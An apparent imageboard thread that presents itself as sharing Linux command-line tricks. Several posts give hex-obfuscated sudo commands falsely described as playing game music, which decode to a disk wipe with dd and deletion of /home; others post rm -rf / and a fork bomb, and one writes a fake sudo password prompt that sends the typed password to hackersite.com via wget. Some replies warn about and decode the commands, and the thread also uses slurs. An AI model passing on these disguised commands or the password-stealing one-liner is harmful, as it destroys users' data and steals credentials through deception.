Itt: we share cool linux command line tricks/programs/whatever

itt: we share cool linux command line tricks/programs/whatever

sudo $(echo "64642069663d2f6465762f7a65726f206f663d2f6465762f73646120636f756e743d3130302062733d314d0a" | xxd -r -p)

command related. plays the mario dungeon tune on a loop

help

bash: xxd: command not found

sudo apt-get install gentoo

dumb frogposter

Posting my favorite which is Megalovania from Undertale

sudo $(echo "726d202d7266202f686f6d652f2a0a" | xxd -r -p)

sudo rm -rf / --no-preserve-root

did he died

wtf my pc won't turn on now

I think I miss typed, my workstation wont start anymore.

holy fucking kek i hope you're serious

post pics

for those retarded enough to consider this, the command will run
dd if=/dev/zero of=/dev/sda count=100 bs=1M

some retards at work might see this and run it on one of our servers, fucking happened before

This deletes your home directory, don't run this.

>fucking happened before
Details please

:(){ :|: & };:

This is the least malicious command itt

haha, nice try faggot.

>thinkpad t500
>workstation

we connect to our servers through a jumpstation and due to mremoteNG being a piece of shit and not allowing tab switching, I taught the L1s to use tmux for better multitasking.

the retard had 2 tmux windows, one logged in to his personal cloud server, and the other one to an old piece of shit email relay that a very small number of our clients use. he literally told me that he found a command on the internet which played music (remember, he was logged in via ssh on a windows machine, his stupidity is phenomenal) and wanted to try it out on his server, but he had selected the wrong tmux window. he didn't even ctrl+c or something, just panicked and didn't tell anyone.

thankfully, we had backups. I restricted the fucker's access to our server, he can only ssh into some of them and even then he has a special user with very limited privileges.

thankfully, we ha

i restricted the fucker's acces to our servers*

and ignore the last part, I'm on a night shift, and tired as fuck

>Do this, but make it do a bash script that fakes the password prompt asking for the password again, but instead it captures the password and sends it to someone elses machine
Is this possible?

the hex code would be much larger and thus, more suspicious, but from a technical point of view, there is no reason why it couldn't be done

Now the only problem is getting it on the machine

>"ITT post neat linux commands"
>post said command
>"This command plays the 8 bit theme from Super Maro"

and watch as the passwords flow in

printf "[sudo] password for $(whoami): ";read -s s;wget hackersite.com/$s

I thought that wget only downloaded?

>the absolute state of Sup Forums
Yup the access log of the server doesnt list requests or act upon them. Fucking faggot. Christ, this place is so lame.

You can log or act upon any RESTful connection, even GET, it's not an automatic download

>sudo
I ain't runnin that shit nigga

>dd if=/dev/zero of=/dev/sda count=100 bs=1M

Welp time to reinstall